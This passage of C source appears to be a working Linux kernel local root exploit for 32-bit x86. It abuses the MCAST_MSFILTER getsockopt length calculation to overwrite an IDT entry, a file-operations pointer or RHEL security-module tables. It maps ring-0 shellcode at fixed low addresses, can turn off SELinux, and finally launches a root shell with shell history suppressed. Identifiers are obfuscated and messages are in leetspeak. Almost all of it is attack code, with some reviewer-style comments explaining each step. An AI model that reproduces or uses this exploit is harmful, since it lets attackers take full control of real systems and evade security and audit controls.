      __gggdfstsgdt_dddex("OK! %s->%s\n", s, reloc_a);
      return strtoull(reloc_a, NULL, 16);
    }
  }
  return 0;
}

/* Resolves `s` from KALLSYMS with ignore_flag = 0, i.e. the lookup only
 * proceeds when KERN_HHSYPPLORQTWGFD has been set in `flags`. */
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) {
  const char *symfile = KALLSYMS;
  return get_sym_ex(s, symfile, 0);
}

/* Parses a comma-separated triple of hex values ("A,B,C") into the global
 * _m_cred[0..2] using strtoull(…, 16). Returns -1 if the input ends before
 * the third field is reached, 0 otherwise. Each field is copied into a
 * 64-byte scratch buffer without a length check. */
static int parse_cred(const char* val) {
  const char *cursor = val;
  int field;
  for(field = 0; field < 3; field++) {
    char scratch[64] = {0};
    char *out = scratch;
    while(*cursor != '\0' && *cursor != ',')
      *out++ = *cursor++;
    /* running out of input is only acceptable on the last field */
    if(*cursor == '\0' && field != 2)
      return -1;
    _m_cred[field] = strtoull(scratch, NULL, 16);
    cursor++;   /* step over the ',' (or past the terminator on the last field) */
  }
  return 0;
}

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

/* Selects the LSM_rhel entry for the running kernel. With check_rhel set,
 * a release containing neither ".el4" nor ".el5" is rejected (NULL).
 * known_targets is then scanned for an exact krelease+kversion match;
 * failing that, the five symbols are resolved from
 * "/boot/System.map-<release>" into the static dyn4nt4n1labeggeyrthryt
 * (ignore_flag=1, so the kallsyms-readable flag is bypassed). Returns NULL
 * if any of the five lookups yields 0. mapbuf is 128 bytes: 17 for the
 * prefix plus at most 63 from krelease[64]. */
struct LSM_rhel *lsm_rhel_find_target(int check_rhel) {
   int i;   /* compared with a size_t below: signed/unsigned comparison */
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);
   if(check_rhel && !isRHHGDPPLADSF(krelease)) {
     __pppp_tegddewyfg("N0t a RHEL k3rn3l! \n");
     return NULL;
   }
   __pppp_tegddewyfg("L00k1ng f0r kn0wn t4rg3tz\n");
   /* first match wins; both uname strings must be identical */
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
       __gggdfstsgdt_dddex("Th1z 1z good as rooted. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }
   __pppp_tegddewyfg("c0mput3r 1z aqu1r1ng n3w t4rg3t\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   /* fall back to the System.map of the running release */
   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

   /* all five are required; a single miss discards the dynamic entry */
   if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
    return NULL;
   return &dyn4nt4n1labeggeyrthryt;
}

/* Probes the environment and parses the command line into the globals.
 *  - Sets KERN_HHSYPPLORQTWGFD when KALLSYMS can be opened and read.
 *  - Fills krelease/kversion via wtfyourunhere_heee(); `ver` is the third
 *    release component, and the program exits if it cannot be read.
 *  - Options: -i (IDT: disables the LSM and FOPS vectors), -f (disables LSM
 *    and IDT), -l (disables IDT and FOPS), -c A,B,C (cred addresses),
 *    -k ADDR (fops address), -s (request SELinux disabling when detected),
 *    -o OFF (per-cpu offset). Unknown options are silently ignored.
 *  - ver >= 29: resolves the three cred symbols unless -c supplied them,
 *    exits if any is missing, and patches them into r1ngrrrrrrr.
 *  - ver >= 30: resolves the per-cpu offset unless -o supplied it, exits
 *    if missing, and patches it into ttrfd0 and ruujhdbgatrfe345.
 * NOTE(review): `fd` is not checked before read(); read(-1, …) fails with
 * EBADF and close(-1) is harmless, so the flag is simply not set, but the
 * intent would be clearer with an explicit check. `__b` is a reserved
 * identifier (leading double underscore). */
static void put_your_hands_up_hooker(int argc, char *argv[]) {
  int fd,ver,ret;
  char __b[16];
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0)) {
    __pppp_tegddewyfg("Kallsyms +r\t\n");
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);
  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 g3t r3l3as3!\n");
  __gggdfstsgdt_dddex("K3rn3l r3l3as3: %s\n", krelease);
  if(argc != 1) {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) {
      switch(ret) {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	case 'l':
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;
        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;
        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;
        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("s3l1nux 1z n0t 3n4bl3d!\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }
  if(ver >= 29) // needs cred structure
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
    /* -c overrides the kallsyms lookup; all three are needed */
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      __yyy_tegdtfsrer("Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }
    __pppp_tegddewyfg("Kernel Credentials detected\n");
    /* unaligned 8-byte stores into the char array at fixed offsets */
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }
  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);   /* truncated to 32 bits */
    if(!_m_cpu_off)
      __yyy_tegdtfsrer("Err0r s3tt1ng up cr3d sh3llc0d3z\n");
    __pppp_tegddewyfg("K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}

/* Chooses the vector after put_your_hands_up_hooker() has parsed options:
 *  1. FOPS, unless disabled: resolves RW_FOPS from kallsyms (unless -k
 *     supplied it) and sets usefops when an address is known.
 *  2. LSM (RHEL only), unless disabled or FOPS was already chosen: sets
 *     uselsm when lsm_rhel_find_target(1) returns a target.
 *  3. With -i plus -s: repeats the target lookup without the RHEL check,
 *     only to obtain the SELinux addresses; clears the SELinux flag when
 *     nothing is found.
 * Exits when none of useidt/usefops/uselsm ended up set. */
static void env_prepare(int argc, char* argv[]) {
  put_your_hands_up_hooker(argc, argv);
  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  {// try fops
    __pppp_tegddewyfg("Trying the F0P m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    if(_m_fops) {
      usefops=1;
      __pppp_tegddewyfg("chose attack vector F0Ps\n");
    }
  }
  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) {// try lsm(rhel)
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target) {
       __pppp_tegddewyfg("u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
    }
    else
      uselsm=1;
  }
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    // -i flag
    /* here curr_target is only needed for its SELinux addresses */
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("Un4lb3 t0 f1nd t4rg3t: c0ntinu3ing w1th0ut s3linsux d1s4bl3d.\n");
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }
  if(!usefops && !useidt && !uselsm)
  __yyy_tegdtfsrer("3v3ryth3ng f41l3d!! try an0th3r sploit\n");
}

/* Derives the optlen value from a 64-bit address `addr` and the 32-bit
 * stack address `stack`: (stack + 8) - addr - 16, truncated to int.
 * `8 + stack` is evaluated in 32-bit unsigned arithmetic before being
 * widened to 64 bits; the remainder is 64-bit unsigned arithmetic. */
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) {
  __dgdhdytrg55 base = 8 + stack;
  __yyrhdgdtfs66ytgetrfd distance = (__yyrhdgdtfs66ytgetrfd)base - addr;
  return (int)(distance - 16);
}

static struct socketcallAT at;   /* argument block for bitch_call(), filled by fillsocketcallAT() */
/* the four 32-bit words idt_smash() feeds, one per call, at successive
 * 4-byte offsets from its base argument */
static __dgdhdytrg55 idtover[4] =
             {0x00100000UL,
              0x0020ee00UL,
              0x00000000UL,
              0x00000000UL};

/* Loads the global argument block `at` from the globals: socket `s`,
 * level SOL_IP, option MCAST_MSFILTER, optval -> buffer,
 * optlen -> &magiclen. */
static void fillsocketcallAT() {
 struct socketcallAT args = {
   .s = s,
   .level = SOL_IP,
   .optname = MCAST_MSFILTER,
   .optval = buffer,
   .optlen = &magiclen,
 };
 at = args;
}

/* Issues socketcall(2) through `int $0x80` with the user stack temporarily
 * pointed at `stack`: eax = 0x66 (sys_socketcall on 32-bit x86),
 * ebx = 0xf (the SYS_GETSOCKOPT multiplexer number), ecx = `at` (the packed
 * argument block). ebx/esi/ecx/edx are pushed first, the current esp is
 * parked in esi, and both esp and the registers are restored after the
 * syscall returns. The kernel's return value in eax is discarded. The
 * clobber list covers eax/ecx/ebx/esi; edx is preserved by the push/pop. */
static void bitch_call(struct socketcallAT *at, void *stack) {
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"      /* sys_socketcall */
      "movl $0xf, %%ebx\t\n"       /* SYS_GETSOCKOPT */
      "movl %%esp, %%esi\t\n"      /* remember the real stack */
      "movl %0, %%ecx\t\n"         /* argument block */
      "movl %1, %%esp\t\n"         /* switch to the supplied stack */
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"      /* back to the real stack */
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

/* Fills the global `buffer` with `value`, treating it as an array of
 * 32-bit words. The word count is sizeof(buffer)/sizeof(void*), which on
 * the 32-bit build this file requires covers the whole 1024-byte buffer. */
static void __setmcbuffer(__dgdhdytrg55 value) {
  __dgdhdytrg55 *slot = (__dgdhdytrg55*)buffer;
  __dgdhdytrg55 *end = slot + sizeof(buffer)/sizeof(void*);
  while(slot < end)
    *slot++ = value;
}

/* Runs four socketcalls in sequence, one per idtover[] entry: the buffer
 * is filled with idtover[i], magiclen is derived from idtbase + 4*i and
 * Y0Y0STOP via get_socklen(), and bitch_call() is invoked with the stack
 * at Y0Y0STOP. `i` is int but compared with a size_t. */
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) {
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) {
    curr = idtover[i];
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  }
}

/* Maps one anonymous RW page at the fixed address Y0Y0SMAP (MAP_FIXED, so
 * anything already mapped there is replaced) and exits via perror() on
 * failure. Y0Y0STOP (Y0Y0SMAP + 0xFFC) lies inside this page and is the
 * stack handed to bitch_call(). The returned pointer is not kept. */
static void y0y0stack() {
  void* map = mmap((void*)Y0Y0SMAP,PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");
}

/* Maps one anonymous page at the fixed address Y0Y0CMAP and exits via
 * perror() on failure. With TRY_REMAP_DEFAULT defined (it is, above) the
 * page is RW only and main() later calls rey0y0code() to re-map it
 * read+exec through a file; otherwise it is mapped RWX directly. */
static void y0y0code() {
void* map = mmap((void*)Y0Y0CMAP,PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}

/* Re-maps the page at `old` as PROT_READ|PROT_EXEC by round-tripping it
 * through a file: any stale "<cwd>/__tmpfile" is unlinked, the page's
 * contents are written to a fresh one (mode S_IRWXU), the anonymous
 * mapping is dropped, the file is mapped back at the same address with
 * MAP_FIXED, and the file is unlinked again. Returns -1 on open/munmap/mmap
 * failure, otherwise the first byte of the page, read once through the
 * new mapping (the volatile read also faults the page in).
 * NOTE(review): getcwd() and write() return values are unchecked, the
 * strcat() onto the 1024-byte cwd buffer has no bound, `fd` is never
 * closed, and the byte is returned through a `char`, so a first byte
 * >= 0x80 would appear negative and be taken as failure by the caller's
 * `< 0` test. The temporary file is briefly visible in the caller's cwd. */
static int rey0y0code(unsigned long old) {
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  getcwd(cwd, sizeof(cwd));
  strcat(cwd, "/__tmpfile");
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1;
  write(fd, (const void*)old, PAGE_SIZE);
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;
  map = mmap((void*)old,PAGE_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE|MAP_FIXED,fd,0);
  if(map == MAP_FAILED)
  return -1;
  wizard = *((char*)old);   /* touch the new mapping */
  unlink(cwd);
  return wizard;
}

/* Entry point. env_prepare() parses the options and picks exactly one of
 * useidt/usefops/uselsm; the two `if/else if` ladders below select which
 * stub is copied to J0J0S / J0J0R00T and which trigger is run. The uid is
 * captured before anything else and patched into the standard stub at
 * R0C_0FF. After the trigger, a shell is spawned only if getuid() reports
 * 0; the parent waits for it before closing the socket.
 * NOTE(review): the FOPS branch's `fd` for TMAGIC_66TDFDRTS is never
 * closed, and the child's execve() has no failure path — on error it
 * falls through to the close/return at the bottom. */
int main(int argc, char*argv[]) {
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;
  printf(BANNER);
  uid = getuid();
  env_prepare(argc, argv);
  y0y0stack();
  y0y0code();
  if(useidt) {
    idtb = getidt();
    __gggdfstsgdt_dddex("b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0de - IDT\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
      __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  } else if(usefops || uselsm) {
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0d3 - F0PZzzZzZZ/LSD(M)\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __setmcbuffer(J0J0S);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }
  /* second stage: cred-based stub (ver >= 29) or the uid-patched one */
  if(flags & KERN_DGGDYDTEGGETFDRLAK) {
    __pppp_tegddewyfg("Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  } else {
    __pppp_tegddewyfg("Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }
  __pppp_tegddewyfg("0p3n1ng th3 m4giq p0rt\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
  __xxxfdgftr_hshsgdt("socket");
  fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
  /* the code page was mapped RW; make it R+X before anything jumps there */
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 r3m4p sh1t\t\n");
#endif
  if(useidt) {
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));
    sleep(1);
    asm volatile("int $0xdd\t\n");
  } else if(usefops) {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
    __pppp_tegddewyfg("Killin f0ps\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);   /* never closed */
    if(fd < 0)
    __xxxfdgftr_hshsgdt("fuq t1m3r_l1st");
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  } else if(uselsm) {
    int msqid;
    /* three ops tables, each touched at offset 8*RHEL_LSM_OFF, two words each */
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("fuq!");
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it here
  }
  munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  if(getuid() == 0) {
    pid_t pid;
    __pppp_tegddewyfg("[!] got root\n");
    pid = fork();
    if(pid == 0)
    {
      /* child: interactive shell with history disabled and a fixed PATH */
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", 

"HISTFILESIZE=0","PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } else {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("[-] exploit failed!\n");
  close(s);
  return 0;
}

…thank god the nightmare is over…